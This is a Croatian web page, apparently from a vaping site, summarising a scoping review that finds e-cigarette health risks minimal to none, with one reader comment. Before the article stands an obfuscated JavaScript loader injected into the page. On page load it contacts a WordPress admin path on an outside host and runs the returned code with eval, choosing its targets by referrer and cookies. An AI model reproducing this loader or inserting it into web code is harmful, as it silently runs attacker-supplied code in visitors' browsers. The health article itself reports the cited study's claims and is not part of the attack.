;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
Je li štetnost e cigareta minimalna do nikakva?

Je li štetnost e cigareta minimalna do nikakva?

Pušenje je i dalje vodeći uzrok bolesti i prerane smrti koji se može spriječiti, odgovoran za više od osam milijuna smrtnih slučajeva godišnje u svijetu. Neki dijelovi svijeta svjedoci su dramatičnog smanjenja stope prevalencije pušenja paralelno s uvođenjem proizvoda za smanjenje štetnosti duhana (THR), uz značajne primjere Švedske i Norveške gdje je pušenje cigareta gotovo eliminirano kao rezultat upotrebe snusa.

Oni zajedno pružaju pravovremenu priliku da se smanji smrtnost uzrokovana pušenjem do te mjere da bi to predstavljalo jedno od najvećih dostignuća u povijesti javnog zdravstva. Glavna prepreka tome je percipirani sigurnosni profil THR proizvoda, što je rezultiralo ograničenjima i zabranama njihove prodaje i uporabe, te dezinformiranom javnosti što je dovelo do oklijevanja s njihovim prihvaćanjem.

Prethodne procjene izvještavale su da su e-cigarete 25 puta manje štetne od cigareta što je uključeno u britansku politiku smanjenja štete uzrokovane duhanom. Izravni podaci o ljudima bili su ograničeni zbog ograničenja provođenja konvencionalnih dokaza visoke razine, kao što su podaci o ispitivanjima u stvarnom svijetu.

„Namjerili smo pružiti sveobuhvatan i konačan sažetak zdravstvenih rizika od upotrebe THR proizvoda provodeći sustavne preglede studija koje istražuju zdravstvene ishode kod ljudi od upotrebe elektroničkih sustava za isporuku nikotina (ENDS) kao što su e-cigarete i vape. Primijenili smo stroge kriterije za uključivanje, u skladu s PRISMA protokolima, i ocijenili studije za kvalitetu i snagu dokaza u odnosu na standardizirane okvire,“ rekla je Cother Hajat, profesor javnog zdravlja, medicinski i epidemološki savjetnik. 

„Od 37 studija koje su bile prihvatljive za uključivanje u naš pregled, većina je bila niske razine dokaza, a više od polovice ocijenjeno je kao “loše”. Ipak, nije se pokazalo da uporaba ENDS-a uzrokuje štetne KVB ili respiratorne ishode, a prelazak s cigareta na e-cigarete bio je povezan s poboljšanom kontrolom hipertenzije i smanjenim egzacerbacijama KOPB-a, bez dokaza o povećanom riziku od astme ili dugotrajnog oštećenja dišnog sustava. Mentalno zdravlje nije dovoljno proučavano da bi se došlo do zaključka zbog složenog odnosa s ovisnošću i korištenjem nikotina, no nisu potvrđeni nikakvi negativni zdravstveni ishodi. Rak i smrtnost nisu dovoljno proučeni kako bi se stvorio konsenzus.“

Ovaj tjedan Regulatorna agencija za lijekove i zdravstvene proizvode (MHRA) u Velikoj Britaniji objavila je svoje planove kako bi omogućila licenciranje visokokvalitetnih i učinkovitih proizvoda za e-cigarete kao lijekove, te stoga omogućila liječnicima da ih prepisuju pacijentima koji žele prestati pušiti.

„Naš pregled pruža važne informacije o zdravstvenim rizicima, a nalazi bi trebali hitno informirati globalnu politiku kako bi se olakšao siguran prijelaz sa štetnih duhanskih proizvoda kao što su cigarete na sigurnije oblike THR proizvoda,“ kaže Hajat.

E cigarete i slični proizvodi ne bi se trebali smatrati duhanskim proizvodima

Preporuke za nastojanja politike THR-a su da se proizvodi za isporuku nikotina za koje se smatra da su pod vrlo malim rizikom zbog odsutnosti duhana, npr. ENDS, nikotinske vrećice, snus, ne bi trebali smatrati duhanskim proizvodima radi politike i regulative, već se umjesto toga smatrati kao dragocjena pomagala za pušače koji žele prestati. Nadalje, buduća istraživanja u THR prostoru trebala bi zadovoljiti neke osnovne metodološke standarde, kao što je korištenje standardnih definicija za izloženost THR proizvodima i usporedne skupine.

„Ukratko, nalazi našeg pregleda su da se rizici od uporabe ENDS-a kreću od minimalnih do nultih i podržavaju konsenzus sve većeg broja organizacija da je upotreba ovih proizvoda sigurnija od rizika koji predstavlja pušenje cigareta. Potrebno je napraviti jasnu razliku između štetnih duhanskih proizvoda kao što su cigarete i neki oblici duhana za žvakanje, te sustava za isporuku nikotina koji mogu pomoći u borbi protiv upotrebe duhana.“

Politike namijenjene zaštiti javnosti od štete uzrokovane ENDS i SLT proizvodima moraju se ažurirati kako bi se uzele u obzir šire štete i koristi za društvo, kao što je ovisnost, te odmjeriti sve štete specifične za proizvod u odnosu na alternativni scenarij, koji je u većini slučajeva nastavak pušenja cigareta.

„Širi utjecaji upotrebe duhana i THR proizvoda na pojedinca, kućanstvo i društvo nisu bili obuhvaćeni našom analizom, ali su važna razmatranja i nadamo se da će ih budući istraživači uzeti u obzir kako bi dodatno informirali politiku.“

Napomena: Ovaj se članak temelji na izvještaju liječnice Cother Hajat čije izjave nalazite u samom tekstu.

Kompletan izvještaj možete pronaći ovdje: Hajat C, Stein E, Shantikumar S, Niaura R, Ferrara P, Polosa R. A scoping review of studies on the health impact of electronic nicotine delivery systems. Intern Emerg Med. 2021 Oct 12. doi: 10.1007/s11739-021-02835-4. Epub ahead of print. PMID: 34637075.

Choose your Reaction!
  • Sigurno je manje štetan Vape od cigareta, u to nema nikakve sumnje. Inače, po običaju, informativan i lijepo napisan članak :)

Leave a Comment